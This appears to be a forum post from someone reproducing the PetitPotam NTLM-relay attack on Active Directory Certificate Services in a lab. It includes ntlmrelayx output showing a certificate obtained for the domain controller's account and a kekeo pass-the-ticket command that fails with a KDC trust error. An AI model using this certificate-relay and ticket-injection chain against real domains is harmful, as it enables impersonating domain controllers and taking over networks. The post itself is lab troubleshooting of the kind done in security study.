I’m following this article to reproduce the EFS bug: https://blog.truesec.com/2021/08/05/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory/
- Windows 2016 AD (Hostname: W2016$)
- Windows 2016 SRV01 (Running AD CS service)
- Windows 2016 SRV02 (Attack machine)
I’ve successfully generated the certificate with ntlmrelayx:

(*) Skipping user W2016$ since attack was already performed
(*) GOT CERTIFICATE!
(*) Base64 certificate of user W2016$: ...
Then I logged in to SRV02 with a low-privilege user. When I pass the ticket in kekeo, it results in a KDC_ERROR_CLIENT_NOT_TRUSTED error:

# tgt::ask /pfx:xxx /user:W2016$ /domain:corp.aaron.com /ptt
...
Realm : corp.xx.com (corp)
User : W2016$ (W2016$)
CName : W2016$ (KRB_NT_PRINCIPAL (1))
SName : krbtgt/corp.xx.com (KRB_NT_SRV_INST (2))
Need PAC : Yes
Auth mode : RSA
(kdc) name: W2016.corp.xx.com (auto)
(kdc) addr: 172.16.177.130 (auto)
KDC_ERROR_CLIENT_NOT_TRUSTED (62)
Does anyone know what’s wrong here?